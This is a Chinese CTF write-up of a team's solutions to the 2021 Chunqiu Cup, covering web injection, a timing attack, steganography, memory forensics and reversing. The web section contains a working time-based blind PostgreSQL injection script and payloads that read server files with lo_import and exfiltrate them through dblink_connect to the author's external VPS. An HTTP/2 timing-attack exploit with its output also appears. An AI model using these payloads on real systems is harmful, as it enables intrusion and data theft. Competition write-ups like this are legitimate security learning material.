2021 “春秋杯” Write Up

综述

image-20210131193946651

ID:Ha1c9on

Rank:2

Solved:11

签到

带着FUN扫就行了

flag{ju5t_f0r_FUN}

按F注入

注入Postgresql

import requests
import time


#x = 'SELECT string_agg(column_name, \',\') FROM information_schema.columns where table_schema=\'public\' and table_name=\'searches\''

x = 'SELECT string_agg(cast(oid as text), \',\') FROM pg_largeobject_metadata'
headers = {
    "User-Agent": "iphone"
}
tmp = requests.get(url = "http://eci-2zeah4wrv6seqyg1zcq7.cloudeci1.ichunqiu.com/",headers=header)
ans = ''
for i in range(10,40):
    
    l = 20
    r = 128

    while l < r:

        mid = (l + r) // 2

        payload = "http://eci-2zeah4wrv6seqyg1zcq7.cloudeci1.ichunqiu.com/?f=kaibro' union select 1,(select case when ascii(substring(({}),{},1))>{} then(cast(pg_sleep_for('0.05 minutes') as text)) else NULL end) --".format(x, i+1, mid)

        print payload
        try:
            req = requests.get(payload, cookies=tmp.cookies, headers=headers)
        except:
            bb=1

        a = time.time()
        try:
            req = requests.get(payload, cookies=tmp.cookies, headers=headers)
            res = req.text
            #print res
        except:
            bb=1
        b = time.time()

        if(b - a > 2):
            l = mid + 1
        else:
            r = mid
    ans += chr((l + r) // 2)
    print ans

可以读到user=docker databasename = docker_db public searches 等数据

不过没啥用

原题改编

https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration

写oid

f=ha1c9on' union select (select lo_import('/var/www/html/index.php')),'1' --

读oid

f=ha1c9on' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(oid as text), ',') FROM pg_largeobject_metadata) || ' password=postgres dbname=postgres')) --

远程VPS

 sudo tcpdump -X -i  eth0 port 5432 -v

image-20210129160422310

读文件 因为postgresql 会在空格或者换行的时候阶段 所以直接替换为空

f=ha1c9on' UNION SELECT 1,(SELECT dblink_connect('host=132.232.82.54 port=5432 user=docker password=123456 dbname=docker_db'||(SELECT replace(substring(encode(lo_get(16441),'base64'),1,900),chr(10),'')))) --

index.php

<?php

error_reporting(0);
session_start();

function is_mobile(){
    if (isset ($_SERVER['HTTP_USER_AGENT'])) {
        $clientkeywords = array(
            'nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel','lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi','openwave','nexusone','cldc','midp','wap','mobile'
        );
        if (preg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT']))) {
            return true;
        }
    }
    return false;
}
if (!is_mobile()) {
    die("只有手机才能访问<!--function is_mobile(){-->
<!--if (isset (\$_SERVER['HTTP_USER_AGENT'])) {-->
<!--\$clientkeywords = array(-->
<!--'nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel','lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi','openwave','nexusone','cldc','midp','wap','mobile'-->
<!--);-->
<!--//从HTTP_USER_AGENT中查找手机浏览器的关键字-->
<!--if (preg_match(\"/(\" . implode('|', \$clientkeywords) . \")/i\", strtolower(\$_SERVER['HTTP_USER_AGENT']))) {-->
<!--return true;-->
<!--}-->
<!--}-->
<!--return false;-->
<!--}-->");
}

$user_input = $_GET['f'];

if ($_SESSION["sql_injection"]) {

    $user_input2 = $_SESSION["sql_injection"];

    if(preg_match("/dblink/i", $user_input2)) {
        if(preg_match("/host/i", $user_input2)) {
            $limit = 1;
        }
        $user_input2 = preg_replace('/(connect_timeout ?=)/i', '', $user_input);
        $user_input2 = preg_replace('/(host=)/i', 'connect_timeout=2 host=', $user_input);
//        hack for tcpdump ,only dns
        $user_input2 = preg_replace('/(user=\')/i', 'hack', $user_input2);
        $user_input2 = preg_replace('/(password=\')/i', 'hack', $user_input2);
    }

    $dbconn = pg_connect("host=127.0.0.1 port=5432 dbname=docker_db user=docker password=aYRr45lTgN9I9LJcjcr0");
    pg_query($dbconn, "SET statement_timeout TO 0");
    pg_query($dbconn, "SET idle_in_transaction_session_timeout TO 20");
    pg_query($dbconn, "SET lock_timeout TO 20");

    $sql = "SELECT * FROM searches WHERE search = '".$user_input2."'";

    try {
        if (pg_prepare($dbconn, "my_query", $sql)) {
            $start = microtime(true);
            pg_send_query($dbconn, $sql);
            $error = 0;
        } else {
            pg_send_query($dbconn, "SELECT id FROM searches WHERE search = '0'");
            $error = 1;
        }
    } catch (Exception $e) {
        // Do nothing
    }
}

$_SESSION["sql_injection"] = $user_input;

?>

.htaccess

<FilesMatch "pushF1n4AnK">
  SetHandler application/x-httpd-php
</FilesMatch>

AddType image/jpeg .tank

读flag

http://eci-2ze8hm3v2gm9m5ajpz4k.cloudeci1.ichunqiu.com/?f=ha1c9on' union select (select lo_import('/var/www/html/pushF1n4AnK')),'1' --

image-20210129160040535

borrow_time

WCTF2020 Spaceless Spacing

不同的是改成了post方式

https://github.com/ConnorNelson/spaceless-spacing

按照examples

https://github.com/DistriNet/timeless-timing-attacks/blob/master/examples.py

 

image-20210129210345196

把他本来的exp的GET改成POST就行了

async def time_difference(a, b):
    request_a = H2Request('POST', 'http://8.140.110.118/', {'user-agent': "h2time/0.1",'Content-Type': 'application/x-www-form-urlencoded'}, 'secret='+a)
    request_b = H2Request('POST', 'http://8.140.110.118/', {'user-agent': "h2time/0.1"'Content-Type': 'application/x-www-form-urlencoded'}, 'secret='+b)

image-20210129204507768

NUM_REQUEST_PAIRS 改大点,小了每次的数据不一样。这里卡了很久 就离谱

爆破过程

 $ python3 exp.py 
INFO:exploit:
INFO:exploit:Secret Length: 10
INFO:exploit:
INFO:exploit:Tested: 0 -- 101 91
INFO:exploit:Tested: 1 -- 99 93
INFO:exploit:Tested: 2 -- 84 108
INFO:exploit:Tested: 3 -- 94 98
INFO:exploit:Tested: 4 -- 87 105
INFO:exploit:Tested: 5 -- 92 100
INFO:exploit:Tested: 6 -- 90 102
INFO:exploit:Tested: 7 -- 96 96
INFO:exploit:Tested: 8 -- 102 90
INFO:exploit:Tested: 9 -- 81 111
INFO:exploit:Tested: a -- 95 97
INFO:exploit:Tested: b -- 94 98
INFO:exploit:Tested: c -- 91 101
INFO:exploit:Tested: d -- 88 104
INFO:exploit:Tested: e -- 104 88
INFO:exploit:Tested: f -- 146 46
INFO:exploit:
INFO:exploit:Secret Progress: f
INFO:exploit:Secret Progress took: 41.89676094055176s
INFO:exploit:
INFO:exploit:Tested: f0 -- 102 90
INFO:exploit:Tested: f1 -- 175 17
INFO:exploit:Tested: f2 -- 100 92
INFO:exploit:Tested: f3 -- 97 95
INFO:exploit:Tested: f4 -- 103 89
INFO:exploit:Tested: f5 -- 103 89
INFO:exploit:Tested: f6 -- 101 91
INFO:exploit:Tested: f7 -- 92 100
INFO:exploit:Tested: f8 -- 99 93
INFO:exploit:Tested: f9 -- 91 101
INFO:exploit:Tested: fa -- 101 91
INFO:exploit:Tested: fb -- 99 93
INFO:exploit:Tested: fc -- 91 101
INFO:exploit:Tested: fd -- 91 101
INFO:exploit:Tested: fe -- 102 90
INFO:exploit:Tested: ff -- 97 95
INFO:exploit:
INFO:exploit:Secret Progress: f1
INFO:exploit:Secret Progress took: 42.458295822143555s
INFO:exploit:
INFO:exploit:Tested: f10 -- 94 98
INFO:exploit:Tested: f11 -- 89 103
INFO:exploit:Tested: f12 -- 99 93
INFO:exploit:Tested: f13 -- 94 98
INFO:exploit:Tested: f14 -- 96 96
INFO:exploit:Tested: f15 -- 104 88
INFO:exploit:Tested: f16 -- 184 8
INFO:exploit:Tested: f17 -- 99 93
INFO:exploit:Tested: f18 -- 89 103
INFO:exploit:Tested: f19 -- 87 105
INFO:exploit:Tested: f1a -- 98 94
INFO:exploit:Tested: f1b -- 94 98
INFO:exploit:Tested: f1c -- 96 96
INFO:exploit:Tested: f1d -- 102 90
INFO:exploit:Tested: f1e -- 106 86
INFO:exploit:Tested: f1f -- 99 93
INFO:exploit:
INFO:exploit:Secret Progress: f16
INFO:exploit:Secret Progress took: 42.68552303314209s
INFO:exploit:
INFO:exploit:Tested: f160 -- 92 100
INFO:exploit:Tested: f161 -- 95 97
INFO:exploit:Tested: f162 -- 92 100
INFO:exploit:Tested: f163 -- 99 93
INFO:exploit:Tested: f164 -- 95 97
INFO:exploit:Tested: f165 -- 173 19
INFO:exploit:Tested: f166 -- 94 98
INFO:exploit:Tested: f167 -- 96 96
INFO:exploit:Tested: f168 -- 95 97
INFO:exploit:Tested: f169 -- 95 97
INFO:exploit:Tested: f16a -- 93 99
INFO:exploit:Tested: f16b -- 93 99
INFO:exploit:Tested: f16c -- 91 101
INFO:exploit:Tested: f16d -- 92 100
INFO:exploit:Tested: f16e -- 97 95
INFO:exploit:Tested: f16f -- 87 105
INFO:exploit:
INFO:exploit:Secret Progress: f165
INFO:exploit:Secret Progress took: 42.54023480415344s
INFO:exploit:
INFO:exploit:Tested: f1650 -- 98 94
INFO:exploit:Tested: f1651 -- 99 93
INFO:exploit:Tested: f1652 -- 102 90
INFO:exploit:Tested: f1653 -- 91 101
INFO:exploit:Tested: f1654 -- 94 98
INFO:exploit:Tested: f1655 -- 98 94
INFO:exploit:Tested: f1656 -- 94 98
INFO:exploit:Tested: f1657 -- 94 98
INFO:exploit:Tested: f1658 -- 91 101
INFO:exploit:Tested: f1659 -- 93 99
INFO:exploit:Tested: f165a -- 97 95
INFO:exploit:Tested: f165b -- 97 95
INFO:exploit:Tested: f165c -- 180 12
INFO:exploit:Tested: f165d -- 93 99
INFO:exploit:Tested: f165e -- 97 95
INFO:exploit:Tested: f165f -- 95 97
INFO:exploit:
INFO:exploit:Secret Progress: f165c
INFO:exploit:Secret Progress took: 42.595075845718384s
INFO:exploit:
INFO:exploit:Tested: f165c0 -- 98 94
INFO:exploit:Tested: f165c1 -- 106 86
INFO:exploit:Tested: f165c2 -- 91 101
INFO:exploit:Tested: f165c3 -- 180 12
INFO:exploit:Tested: f165c4 -- 98 94
INFO:exploit:Tested: f165c5 -- 105 87
INFO:exploit:Tested: f165c6 -- 99 93
INFO:exploit:Tested: f165c7 -- 97 95
INFO:exploit:Tested: f165c8 -- 90 102
INFO:exploit:Tested: f165c9 -- 96 96
INFO:exploit:Tested: f165ca -- 106 86
INFO:exploit:Tested: f165cb -- 92 100
INFO:exploit:Tested: f165cc -- 97 95
INFO:exploit:Tested: f165cd -- 98 94
INFO:exploit:Tested: f165ce -- 93 99
INFO:exploit:Tested: f165cf -- 101 91
INFO:exploit:
INFO:exploit:Secret Progress: f165c3
INFO:exploit:Secret Progress took: 42.71966314315796s
INFO:exploit:
INFO:exploit:Tested: f165c30 -- 87 105
INFO:exploit:Tested: f165c31 -- 89 103
INFO:exploit:Tested: f165c32 -- 93 99
INFO:exploit:Tested: f165c33 -- 95 97
INFO:exploit:Tested: f165c34 -- 97 95
INFO:exploit:Tested: f165c35 -- 99 93
INFO:exploit:Tested: f165c36 -- 92 100
INFO:exploit:Tested: f165c37 -- 91 101
INFO:exploit:Tested: f165c38 -- 97 95
INFO:exploit:Tested: f165c39 -- 93 99
INFO:exploit:Tested: f165c3a -- 97 95
INFO:exploit:Tested: f165c3b -- 93 99
INFO:exploit:Tested: f165c3c -- 100 92
INFO:exploit:Tested: f165c3d -- 183 9
INFO:exploit:Tested: f165c3e -- 93 99
INFO:exploit:Tested: f165c3f -- 98 94
INFO:exploit:
INFO:exploit:Secret Progress: f165c3d
INFO:exploit:Secret Progress took: 41.48366594314575s
INFO:exploit:
INFO:exploit:Tested: f165c3d0 -- 94 98
INFO:exploit:Tested: f165c3d1 -- 106 86
INFO:exploit:Tested: f165c3d2 -- 107 85
INFO:exploit:Tested: f165c3d3 -- 109 83
INFO:exploit:Tested: f165c3d4 -- 99 93
INFO:exploit:Tested: f165c3d5 -- 98 94
INFO:exploit:Tested: f165c3d6 -- 89 103
INFO:exploit:Tested: f165c3d7 -- 102 90
INFO:exploit:Tested: f165c3d8 -- 176 16
INFO:exploit:Tested: f165c3d9 -- 100 92
INFO:exploit:Tested: f165c3da -- 95 97
INFO:exploit:Tested: f165c3db -- 95 97
INFO:exploit:Tested: f165c3dc -- 98 94
INFO:exploit:Tested: f165c3dd -- 90 102
INFO:exploit:Tested: f165c3de -- 96 96
INFO:exploit:Tested: f165c3df -- 101 91
INFO:exploit:
INFO:exploit:Secret Progress: f165c3d8
INFO:exploit:Secret Progress took: 42.6696572303772s
INFO:exploit:
INFO:exploit:Tested: f165c3d80 -- 94 98
INFO:exploit:Tested: f165c3d81 -- 93 99
INFO:exploit:Tested: f165c3d82 -- 98 94
INFO:exploit:Tested: f165c3d83 -- 100 92
INFO:exploit:Tested: f165c3d84 -- 98 94
INFO:exploit:Tested: f165c3d85 -- 98 94
INFO:exploit:Tested: f165c3d86 -- 96 96
INFO:exploit:Tested: f165c3d87 -- 90 102
INFO:exploit:Tested: f165c3d88 -- 91 101
INFO:exploit:Tested: f165c3d89 -- 100 92
INFO:exploit:Tested: f165c3d8a -- 96 96
INFO:exploit:Tested: f165c3d8b -- 92 100
INFO:exploit:Tested: f165c3d8c -- 176 16
INFO:exploit:Tested: f165c3d8d -- 97 95
INFO:exploit:Tested: f165c3d8e -- 92 100
INFO:exploit:Tested: f165c3d8f -- 95 97
INFO:exploit:
INFO:exploit:Secret Progress: f165c3d8c
INFO:exploit:Secret Progress took: 42.62544584274292s
INFO:exploit:
INFO:exploit:Tested: f165c3d8c0 -- 91 101
INFO:exploit:Tested: f165c3d8c1 -- 106 86
INFO:exploit:Tested: f165c3d8c2 -- 100 92
INFO:exploit:Tested: f165c3d8c3 -- 102 90
INFO:exploit:Tested: f165c3d8c4 -- 98 94
INFO:exploit:Tested: f165c3d8c5 -- 95 97
INFO:exploit:Tested: f165c3d8c6 -- 101 91
INFO:exploit:Tested: f165c3d8c7 -- 96 96
INFO:exploit:Tested: f165c3d8c8 -- 93 99
INFO:exploit:Tested: f165c3d8c9 -- 182 10
INFO:exploit:Tested: f165c3d8ca -- 95 97
INFO:exploit:Tested: f165c3d8cb -- 92 100
INFO:exploit:Tested: f165c3d8cc -- 103 89
INFO:exploit:Tested: f165c3d8cd -- 99 93
INFO:exploit:Tested: f165c3d8ce -- 99 93
INFO:exploit:Tested: f165c3d8cf -- 96 96
INFO:exploit:
INFO:exploit:Secret Progress: f165c3d8c9
INFO:exploit:Secret Progress took: 42.28636813163757s
INFO:exploit:
INFO:exploit:
INFO:exploit:Secret: f165c3d8c9
INFO:exploit:Correct: b'flag{a8a00a86-46cb-4959-8b26-e4c8cf15b375}'
INFO:exploit:

2019-nCoV

pass.wav

Silent 解密

image-20210130125212051

得到

priebeijoarkjpxmdkucxwdus

根据hint1

http://www.merrybio.com.cn/blog/SARS-CoV-2-genomic-analysis.html
https://www.ncbi.nlm.nih.gov/orffinder/
http://www.merrybio.com.cn/blog/coronavirus-introduction.html

Please notice The largest structural protein
the password is the md5(it's gene sequence) and do not let the ‘\n’ in md5()

让关注最大的结构蛋白

根据文章

image-20210130125355866

寻找其基因序列

image-20210130125416029

用登录号

image-20210130125444106

https://www.ncbi.nlm.nih.gov/orffinder/

裁剪

image-20210130125527952

MFLLTTKRTMFVFLVLLPLVSSQCVNLTTRTQLPPAYTNSFTRGVYYPDKVFRSSVLHSTQDLFLPFFSNVTWFHAIHVSGTNGTKRFDNPVLPFNDGVYFASTEKSNIIRGWIFGTTLDSKTQSLLIVNNATNVVIKVCEFQFCNDPFLGVYYHKNNKSWMESEFRVYSSANNCTFEYVSQPFLMDLEGKQGNFKNLREFVFKNIDGYFKIYSKHTPINLVRDLPQGFSALEPLVDLPIGINITRFQTLLALHRSYLTPGDSSSGWTAGAAAYYVGYLQPRTFLLKYNENGTITDAVDCALDPLSETKCTLKSFTVEKGIYQTSNFRVQPTESIVRFPNITNLCPFGEVFNATRFASVYAWNRKRISNCVADYSVLYNSASFSTFKCYGVSPTKLNDLCFTNVYADSFVIRGDEVRQIAPGQTGKIADYNYKLPDDFTGCVIAWNSNNLDSKVGGNYNYLYRLFRKSNLKPFERDISTEIYQAGSTPCNGVEGFNCYFPLQSYGFQPTNGVGYQPYRVVVLSFELLHAPATVCGPKKSTNLVKNKCVNFNFNGLTGTGVLTESNKKFLPFQQFGRDIADTTDAVRDPQTLEILDITPCSFGGVSVITPGTNTSNQVAVLYQDVNCTEVPVAIHADQLTPTWRVYSTGSNVFQTRAGCLIGAEHVNNSYECDIPIGAGICASYQTQTNSPRRARSVASQSIIAYTMSLGAENSVAYSNNSIAIPTNFTISVTTEILPVSMTKTSVDCTMYICGDSTECSNLLLQYGSFCTQLNRALTGIAVEQDKNTQEVFAQVKQIYKTPPIKDFGGFNFSQILPDPSKPSKRSFIEDLLFNKVTLADAGFIKQYGDCLGDIAARDLICAQKFNGLTVLPPLLTDEMIAQYTSALLAGTITSGWTFGAGAALQIPFAMQMAYRFNGIGVTQNVLYENQKLIANQFNSAIGKIQDSLSSTASALGKLQDVVNQNAQALNTLVKQLSSNFGAISSVLNDILSRLDKVEAEVQIDRLITGRLQSLQTYVTQQLIRAAEIRASANLAATKMSECVLGQSKRVDFCGKGYHLMSFPQSAPHGVVFLHVTYVPAQEKNFTTAPAICHDGKAHFPREGVFVSNGTHWFVTQRNFYEPQIITTDNTFVSGNCDVVIGIVNNTVYDPLQPELDSFKEELDKYFKNHTSPDVDLGDISGINASVVNIQKEIDRLNEVAKNLNESLIDLQELGKYEQYIKWPWYIWLGFIAGLIAIVMVTIMLCCMTSCCSCLKGCCSCGSCCKFDEDDSEPVLKGVKLHYT

Md5 就是mp3的密码98eb1b1760bcc837934c8695a1cee923

MP3Stego解密得到压缩包密码

image-20210130125638832

hint2

you must pay attention to N protein ,How do that get into the viral capsid?
do you know steghide?
the password is encrypt by Vigenère Cipher
the screct key is The top 20 characters with the most occurrences are counted+COMBAT

让我们关注N蛋白的进入方式

image-20210130125733499

以及TOP20词频分析 联想到截取N M E蛋白的基因序列词频分析

image-20210130125811591

得到LGASTRIQKNDPFEVYMWH 这地方因为数字一样排序变化踩了坑

拼接得到LGASTRIQKNDPFEVYMWHCCOMBAT

然后维吉尼亚密码

image-20210130130100797

根据提示用steghide解密

steghide extract -sf CoV-1.jpg 

image-20210130130113619

Snowwwww

Binwalk 分离图和encode

知乎代码复制粘贴

image-20210130145911948

https://www.zhihu.com/question/50735753

%% Run on Matlab2019b 
clc;clear;close all;
alpha = 80;
snow = double(imread('snow.jpg'))/255;
im = double(imread('original.jpg'))/255;
load('encode.mat','M','N');
imsize = size(im);

TA=fft2(im);
TB=fft2(snow);

G=(TB-TA)/alpha;
GG=G;
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(M(i),N(j),:)=G(i,j,:);
    end
end
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:);
    end
end
figure,imshow(GG);title('extracted watermark');

image-20210130145613912

手动ps修下

image-20210130145743544

flag{c93fd2a3-103f-4539-9a51-ad5a6437daa1}

PUzzle

先手动选出可见字符 然后手动拼一下可以得到如下

image-20210130193118553

通过快乐的瞎子辨认可以得到flag{w9w45my6x8kk4e8gp9nq??6j

根据拼图经验大概可以猜测出来flag都在松鼠身上,手动筛选一下图

找到

QxT58mDU0P.JPG、joytdk0Y39.JPG、s9w0Fv214T.JPG等几个 忘了哪几个了

在线网站修一下噪点得到类似下面的图

image-20210130193717657

加上手工盲猜,人为对比等手段得到flag

flag{w9w45my6x8kk4e8gp9nqm6j2c154wad49}

old_driver

非预期老玩家

分析attack.py可知 代码基本就是找出样本攻击中错误的图片序号,然后带到

adversarial_images = [171,34,214,273,116,391,293,127,59,128]

数组 加密下就是flag

出题人还贴心的给了哪个里面有攻击图片 以及flag验证的sha1

众所周知 这种题用时间排序就可以秒一切

DD76223836A3ED15658DAC5CBAD6B8D5

只需要按修改时间排序 就可以拿到错误的图片啦

找不到的手动找一下就好了!

找到如下数据

(1,171->0)     (0,34 ->1)   (6,214->2)   (4,273->3)  
(3,116->4)     (6,391->5)   (5,293->6)   (8,127->7)  
(7,59 ->8)      (1,128->9)

打印下sh1 一致 打印flag

from glob import glob
import torch
from torch import nn, optim
import torch.nn.functional as F
import torchattacks # https://github.com/Harry24k/adversarial-attacks-pytorch
from torchvision import transforms
from PIL import Image
import random
import os
from hashlib import md5, sha256
adversarial_images = [171,34,214,273,116,391,293,127,59,128]
hint2 = sha256(str(sorted(adversarial_images)).encode()).hexdigest()
flag = 'flag{' + md5(str(sorted(adversarial_images)).encode()).hexdigest() + '}'
print(flag)

image-20210131015136199

flag{00d531934c171e1a71405f5e1f171d65}

evilMem

首先内存取证。发现桌面的东西很可疑

 $ vol.py -f image.vmem --profile=Win7SP1x86_23418 filescan |grep Desktop

发现有个Evil.dll

image-20210131124811700

dump 下来ida分析发现是假的

flag{This_flag___is__fake!_LoL}

(mmp)

然后测了一会儿试了下dlldump 果然好使

vol.py -f image.vmem --profile=Win7SP1x86_23418 dlldump -p 1884 -D ./ 

扔到IDA分析

发现除了checkFlag的参数,dll又scanf了一串字符进行第一层验证。 可以直接对该位置下断点,得到密钥chunqiu!

image-20210131125211482

第二层验证通过sub_73441000中找到的字符串特征expand 32-byte k,得知是chacha20加密算法。 根据网上找到的源码,把input数组和密文数组对应进去。

image-20210131125230751

uint32_t input[] = {
0x61707865, 0x3320646E, 0x79622D32, 0x6B206574, 0xAA0F37A3, 0x214FF178, 0x6FF0CC56, 0x4B65E511,
0x2F60906D, 0xCA638692, 0xA001E464, 0x2BE81780, 0x00000000, 0x00000000, 0x6E756863, 0x21756971
};//可由x64dbg dump得到
unsigned char str[] = {
	0xEE, 0x2A, 0xC0, 0x8F, 0x12, 0xAF, 0x33, 0xC5, 0xD1, 0x13,
	0x3E, 0x75, 0xC8, 0x8A, 0xAD, 0xBC, 0x3D, 0x02, 0x00, 0x24,
	0x65, 0x22, 0x03, 0x7E, 0x72, 0x62, 0x33, 0x11, 0xFC, 0x83,
	0x8F, 0xB6
};//可从ida中得到

因为是流密码,所以对密文再跑一次加密,即可得到flag

#include <cstdio>
#include <cstring>
#include <cstdlib>
#include <cstdint>

inline uint16_t bswap_16(uint16_t x)
{
	return (x >> 8) | (x << 8);
}


inline uint32_t bswap_32(uint32_t x)
{
	return (((x & 0xff000000U) >> 24) | ((x & 0x00ff0000U) >> 8) |
		((x & 0x0000ff00U) << 8) | ((x & 0x000000ffU) << 24));
}

inline uint64_t bswap_64(uint64_t x)
{
	return (((x & 0xff00000000000000ull) >> 56)
		| ((x & 0x00ff000000000000ull) >> 40)
		| ((x & 0x0000ff0000000000ull) >> 24)
		| ((x & 0x000000ff00000000ull) >> 8)
		| ((x & 0x00000000ff000000ull) << 8)
		| ((x & 0x0000000000ff0000ull) << 24)
		| ((x & 0x000000000000ff00ull) << 40)
		| ((x & 0x00000000000000ffull) << 56));
}

inline uint32_t htole32(uint32_t host_32bits)///////
{
	return host_32bits;
}

inline uint32_t le32toh(uint32_t little_endian_32bits)////////
{
	return little_endian_32bits;
}

uint32_t static inline ReadLE32(const unsigned char* ptr)
{
	uint32_t x;
	memcpy((char*)&x, ptr, 4);
	return le32toh(x);
}

void static inline WriteLE32(unsigned char* ptr, uint32_t x)
{
	uint32_t v = htole32(x);
	memcpy(ptr, (char*)&v, 4);
}


/** Return the smallest number n such that (x >> n) == 0 (or 64 if the highest bit in x is set. */
uint64_t static inline CountBits(uint64_t x)
{
#if HAVE_BUILTIN_CLZL
	if (sizeof(unsigned long) >= sizeof(uint64_t)) {
		return x ? 8 * sizeof(unsigned long) - __builtin_clzl(x) : 0;
	}
#endif
#if HAVE_BUILTIN_CLZLL
	if (sizeof(unsigned long long) >= sizeof(uint64_t)) {
		return x ? 8 * sizeof(unsigned long long) - __builtin_clzll(x) : 0;
	}
#endif
	int ret = 0;
	while (x) {
		x >>= 1;
		++ret;
	}
	return ret;
}


constexpr static inline uint32_t rotl32(uint32_t v, int c) { return (v << c) | (v >> (32 - c)); }

#define QUARTERROUND(a,b,c,d) \
  a += b; d = rotl32(d ^ a, 16); \
  c += d; b = rotl32(b ^ c, 12); \
  a += b; d = rotl32(d ^ a, 8); \
  c += d; b = rotl32(b ^ c, 7);

/* That is fake
uint32_t input[] = {
	0x61707865, 0x3320646E, 0x79622D32, 0x6B206574, 0x03020100, 0x07060504, 0x0B0A0908, 0x0F0E0D0C,
	0x13121110, 0x17161514, 0x1B1A1918, 0x1F1E1D1C, 0x00000000, 0x00000000, 0x656B6166, 0x21737669
};
*/
uint32_t input[] = {
0x61707865, 0x3320646E, 0x79622D32, 0x6B206574, 0xAA0F37A3, 0x214FF178, 0x6FF0CC56, 0x4B65E511,
0x2F60906D, 0xCA638692, 0xA001E464, 0x2BE81780, 0x00000000, 0x00000000, 0x6E756863, 0x21756971
};
void Crypt(const unsigned char* m, unsigned char* c) {
	size_t bytes = 512;
	uint32_t x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
	uint32_t j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
	unsigned char* ctarget = NULL;
	unsigned char tmp[64];
	unsigned int i;

	if (!bytes)
		return;

	j0 = input[0];
	j1 = input[1];
	j2 = input[2];
	j3 = input[3];
	j4 = input[4];
	j5 = input[5];
	j6 = input[6];
	j7 = input[7];
	j8 = input[8];
	j9 = input[9];
	j10 = input[10];
	j11 = input[11];
	j12 = input[12];
	j13 = input[13];
	j14 = input[14];
	j15 = input[15];

	for (;;) {
		if (bytes < 64) {
			// if m has fewer than 64 bytes available, copy m to tmp and
			// read from tmp instead
			for (i = 0; i < bytes; ++i)
				tmp[i] = m[i];
			m = tmp;
			ctarget = c;
			c = tmp;
		}
		x0 = j0;
		x1 = j1;
		x2 = j2;
		x3 = j3;
		x4 = j4;
		x5 = j5;
		x6 = j6;
		x7 = j7;
		x8 = j8;
		x9 = j9;
		x10 = j10;
		x11 = j11;
		x12 = j12;
		x13 = j13;
		x14 = j14;
		x15 = j15;
		for (i = 20; i > 0; i -= 2) {
			QUARTERROUND(x0, x4, x8, x12)
				QUARTERROUND(x1, x5, x9, x13)
				QUARTERROUND(x2, x6, x10, x14)
				QUARTERROUND(x3, x7, x11, x15)
				QUARTERROUND(x0, x5, x10, x15)
				QUARTERROUND(x1, x6, x11, x12)
				QUARTERROUND(x2, x7, x8, x13)
				QUARTERROUND(x3, x4, x9, x14)
		}
		x0 += j0;
		x1 += j1;
		x2 += j2;
		x3 += j3;
		x4 += j4;
		x5 += j5;
		x6 += j6;
		x7 += j7;
		x8 += j8;
		x9 += j9;
		x10 += j10;
		x11 += j11;
		x12 += j12;
		x13 += j13;
		x14 += j14;
		x15 += j15;

		x0 ^= ReadLE32(m + 0);
		x1 ^= ReadLE32(m + 4);
		x2 ^= ReadLE32(m + 8);
		x3 ^= ReadLE32(m + 12);
		x4 ^= ReadLE32(m + 16);
		x5 ^= ReadLE32(m + 20);
		x6 ^= ReadLE32(m + 24);
		x7 ^= ReadLE32(m + 28);
		x8 ^= ReadLE32(m + 32);
		x9 ^= ReadLE32(m + 36);
		x10 ^= ReadLE32(m + 40);
		x11 ^= ReadLE32(m + 44);
		x12 ^= ReadLE32(m + 48);
		x13 ^= ReadLE32(m + 52);
		x14 ^= ReadLE32(m + 56);
		x15 ^= ReadLE32(m + 60);

		++j12;
		if (!j12)
			++j13;

		WriteLE32(c + 0, x0);
		WriteLE32(c + 4, x1);
		WriteLE32(c + 8, x2);
		WriteLE32(c + 12, x3);
		WriteLE32(c + 16, x4);
		WriteLE32(c + 20, x5);
		WriteLE32(c + 24, x6);
		WriteLE32(c + 28, x7);
		WriteLE32(c + 32, x8);
		WriteLE32(c + 36, x9);
		WriteLE32(c + 40, x10);
		WriteLE32(c + 44, x11);
		WriteLE32(c + 48, x12);
		WriteLE32(c + 52, x13);
		WriteLE32(c + 56, x14);
		WriteLE32(c + 60, x15);

		if (bytes <= 64) {
			if (bytes < 64) {
				for (i = 0; i < bytes; ++i)
					ctarget[i] = c[i];
			}
			input[12] = j12;
			input[13] = j13;
			return;
		}
		bytes -= 64;
		c += 64;
		m += 64;
	}
}

int main() {
	//unsigned char* str = (unsigned char*)malloc(0x1000);
	unsigned char* ret = (unsigned char*)malloc(0x1000);
	//memset(str, 0, sizeof(unsigned char) * 0x1000);
	memset(ret, 0, sizeof(unsigned char) * 0x1000);
	/*
	for (int i = 0; i < 10; i++)
		str[i] = '0' + i;
	for (int i = 0; i < 6; i++)
		str[i+10] = '0' + i;
		*/

	/* fake
	unsigned char str[] =
	{
	  0xA7, 0xC6, 0xFD, 0xA1, 0x56, 0xF6, 0x04, 0x0E, 0x6F, 0x76,
	  0xB9, 0x63, 0x24, 0xCC, 0xE5, 0xD9, 0xA5, 0x9A, 0x0D, 0xAC,
	  0x38, 0x91, 0x80, 0x78, 0x27, 0xD5, 0x2B, 0x3E, 0x14, 0x04,
	  0xBE, 0xE9
	};
	*/
	unsigned char str[] = {
		0xEE, 0x2A, 0xC0, 0x8F, 0x12, 0xAF, 0x33, 0xC5, 0xD1, 0x13,
			0x3E, 0x75, 0xC8, 0x8A, 0xAD, 0xBC, 0x3D, 0x02, 0x00, 0x24,
			0x65, 0x22, 0x03, 0x7E, 0x72, 0x62, 0x33, 0x11, 0xFC, 0x83,
			0x8F, 0xB6
	};
	Crypt(str, ret);
	for (int i = 0; i < 1000; i++)
		printf("%c", *(ret+i));
	return 0;
}

得到

flag{R3im@aging_1ndir3ctly_LoL}

十二宫的挑衅

手撕下图片

^#@$@#()/>@?==%1(
!)>(*+3<#86@-7$^.
4&)8%#5&6!=%1#$-$
